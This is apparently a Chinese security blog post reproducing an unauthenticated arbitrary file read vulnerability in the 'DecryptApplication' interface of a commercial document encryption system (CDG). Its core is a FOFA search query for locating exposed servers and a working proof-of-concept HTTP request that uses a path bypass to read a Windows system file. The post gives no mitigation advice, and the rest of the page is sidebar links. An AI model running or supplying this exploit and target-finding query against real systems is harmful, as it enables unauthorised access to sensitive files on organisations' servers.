某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞复现

0x01 产品简介

某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

某赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。

0x03 复现环境

FOFA:body="/CDGServer3/index.jsp"

0x04 漏洞复现

PoC

GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-17 07:50:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-17 07:50:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-17 07:50:03       82 阅读
  4. Python语言-面向对象

    2024-03-17 07:50:03       91 阅读

热门阅读

  1. 如何保持简单轻量的架构

    2024-03-17 07:50:03       41 阅读
  2. 前端 网络相关事件 交互

    2024-03-17 07:50:03       42 阅读
  3. Python中元组的高效使用

    2024-03-17 07:50:03       48 阅读
  4. 图像描述(image caption)模型简单demo(源码理解原理)

    2024-03-17 07:50:03       40 阅读
  5. 第五章 Collections

    2024-03-17 07:50:03       38 阅读
  6. vue3之带参数的动态路由

    2024-03-17 07:50:03       45 阅读
  7. Flutter中GetX的用法(路由管理)

    2024-03-17 07:50:03       36 阅读
  8. Flutter 的 switch 语句补遗

    2024-03-17 07:50:03       41 阅读
  9. ctf-web23

    ctf-web23

    2024-03-17 07:50:03      43 阅读
  10. SDN网络简单认识(2)——南向接口

    2024-03-17 07:50:03       37 阅读
  11. LeetCode 222.完全二叉树的节点个数

    2024-03-17 07:50:03       45 阅读